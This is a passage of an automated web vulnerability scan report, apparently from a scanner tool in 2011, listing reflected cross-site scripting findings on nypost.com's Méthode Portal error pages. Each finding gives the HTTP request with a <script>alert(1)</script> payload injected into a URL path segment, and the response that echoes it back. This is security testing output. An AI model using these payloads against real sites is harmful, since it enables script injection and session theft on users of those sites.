GET /r/SysConfigd6317<script>alert(1)</script>643940e8898/WebPortal/nypost/scripts/block_functions.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 712
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:43 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfigd6317<script>alert(1)</script>643940e8898/WebPortal/nypost/scripts/block_functions.js</p>
...[SNIP]...

1.530. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/block_functions.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/block_functions.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload eb7ee<script>alert(1)</script>2bfeb5a0491 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortaleb7ee<script>alert(1)</script>2bfeb5a0491/nypost/scripts/block_functions.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 712
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:45 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortaleb7ee<script>alert(1)</script>2bfeb5a0491/nypost/scripts/block_functions.js</p>
...[SNIP]...

1.531. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/block_functions.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/block_functions.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 499b3<script>alert(1)</script>7343fa861ea was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost499b3<script>alert(1)</script>7343fa861ea/scripts/block_functions.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 712
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:46 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost499b3<script>alert(1)</script>7343fa861ea/scripts/block_functions.js</p>
...[SNIP]...

1.532. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/block_functions.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/block_functions.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload cfd1e<script>alert(1)</script>bcbdbe420c9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scriptscfd1e<script>alert(1)</script>bcbdbe420c9/block_functions.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 712
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:48 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scriptscfd1e<script>alert(1)</script>bcbdbe420c9/block_functions.js</p>
...[SNIP]...

1.533. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/block_functions.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/block_functions.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload cee0a<script>alert(1)</script>de5fe07510f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts/block_functions.jscee0a<script>alert(1)</script>de5fe07510f HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 712
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:50 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts/block_functions.jscee0a<script>alert(1)</script>de5fe07510f</p>
...[SNIP]...

1.534. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/dropmenu.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/dropmenu.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cc361<script>alert(1)</script>a933244502c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfigcc361<script>alert(1)</script>a933244502c/WebPortal/nypost/scripts/dropmenu.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:45 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfigcc361<script>alert(1)</script>a933244502c/WebPortal/nypost/scripts/dropmenu.js</p>
...[SNIP]...

1.535. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/dropmenu.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/dropmenu.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1fef0<script>alert(1)</script>944434f9cf0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal1fef0<script>alert(1)</script>944434f9cf0/nypost/scripts/dropmenu.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:46 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal1fef0<script>alert(1)</script>944434f9cf0/nypost/scripts/dropmenu.js</p>
...[SNIP]...

1.536. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/dropmenu.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/dropmenu.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 74a05<script>alert(1)</script>4e46e99c1f6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost74a05<script>alert(1)</script>4e46e99c1f6/scripts/dropmenu.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:48 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost74a05<script>alert(1)</script>4e46e99c1f6/scripts/dropmenu.js</p>
...[SNIP]...

1.537. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/dropmenu.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/dropmenu.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 43166<script>alert(1)</script>ecf756f6b93 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts43166<script>alert(1)</script>ecf756f6b93/dropmenu.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:50 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts43166<script>alert(1)</script>ecf756f6b93/dropmenu.js</p>
...[SNIP]...

1.538. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/dropmenu.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/dropmenu.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 9e4d9<script>alert(1)</script>01dd039d6e0 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts/dropmenu.js9e4d9<script>alert(1)</script>01dd039d6e0 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 705
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:53 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts/dropmenu.js9e4d9<script>alert(1)</script>01dd039d6e0</p>
...[SNIP]...

1.539. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/facebox/facebox.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/facebox/facebox.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2e0f5<script>alert(1)</script>47c9fe2342 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig2e0f5<script>alert(1)</script>47c9fe2342/WebPortal/nypost/scripts/facebox/facebox.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:42 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig2e0f5<script>alert(1)</script>47c9fe2342/WebPortal/nypost/scripts/facebox/facebox.js</p>
...[SNIP]...

1.540. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/facebox/facebox.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/facebox/facebox.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 44aaa<script>alert(1)</script>5c1b9ffba5f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal44aaa<script>alert(1)</script>5c1b9ffba5f/nypost/scripts/facebox/facebox.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 712
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:44 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal44aaa<script>alert(1)</script>5c1b9ffba5f/nypost/scripts/facebox/facebox.js</p>
...[SNIP]...

1.541. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/facebox/facebox.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/facebox/facebox.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e4dab<script>alert(1)</script>a55b4d1622d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nyposte4dab<script>alert(1)</script>a55b4d1622d/scripts/facebox/facebox.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 712
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:46 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nyposte4dab<script>alert(1)</script>a55b4d1622d/scripts/facebox/facebox.js</p>
...[SNIP]...

1.542. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/facebox/facebox.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/facebox/facebox.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 60e14<script>alert(1)</script>95992cc8016 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts60e14<script>alert(1)</script>95992cc8016/facebox/facebox.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 712
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:47 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts60e14<script>alert(1)</script>95992cc8016/facebox/facebox.js</p>
...[SNIP]...

1.543. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/facebox/facebox.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/facebox/facebox.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 1e955<script>alert(1)</script>13e9840f8e3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts/facebox1e955<script>alert(1)</script>13e9840f8e3/facebox.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 712
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:49 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts/facebox1e955<script>alert(1)</script>13e9840f8e3/facebox.js</p>
...[SNIP]...

1.544. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/facebox/facebox.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/facebox/facebox.js

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 996bb<script>alert(1)</script>a7dab6d0334 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/scripts/facebox/facebox.js996bb<script>alert(1)</script>a7dab6d0334 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 712
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:52 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/scripts/facebox/facebox.js996bb<script>alert(1)</script>a7dab6d0334</p>
...[SNIP]...

1.545. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fe6c8<script>alert(1)</script>ee4c6367be9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfigfe6c8<script>alert(1)</script>ee4c6367be9/WebPortal/nypost/scripts/jquery-ui-tabs.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:36 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfigfe6c8<script>alert(1)</script>ee4c6367be9/WebPortal/nypost/scripts/jquery-ui-tabs.js</p>
...[SNIP]...

1.546. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1aca5<script>alert(1)</script>eaa7d7535d7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal1aca5<script>alert(1)</script>eaa7d7535d7/nypost/scripts/jquery-ui-tabs.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:37 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal1aca5<script>alert(1)</script>eaa7d7535d7/nypost/scripts/jquery-ui-tabs.js</p>
...[SNIP]...

1.547. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/scripts/jquery-ui-tabs.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a36ef<script>alert(1)</script>d7a4ed15351 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nyposta36ef<script>alert(1)</script>d7a4ed15351/scripts/jquery-ui-tabs.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:39 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nyposta36ef<script>alert(1)</script>d7a4ed15351/scripts/jquery-ui-tabs.js</p>
...[SNIP]...

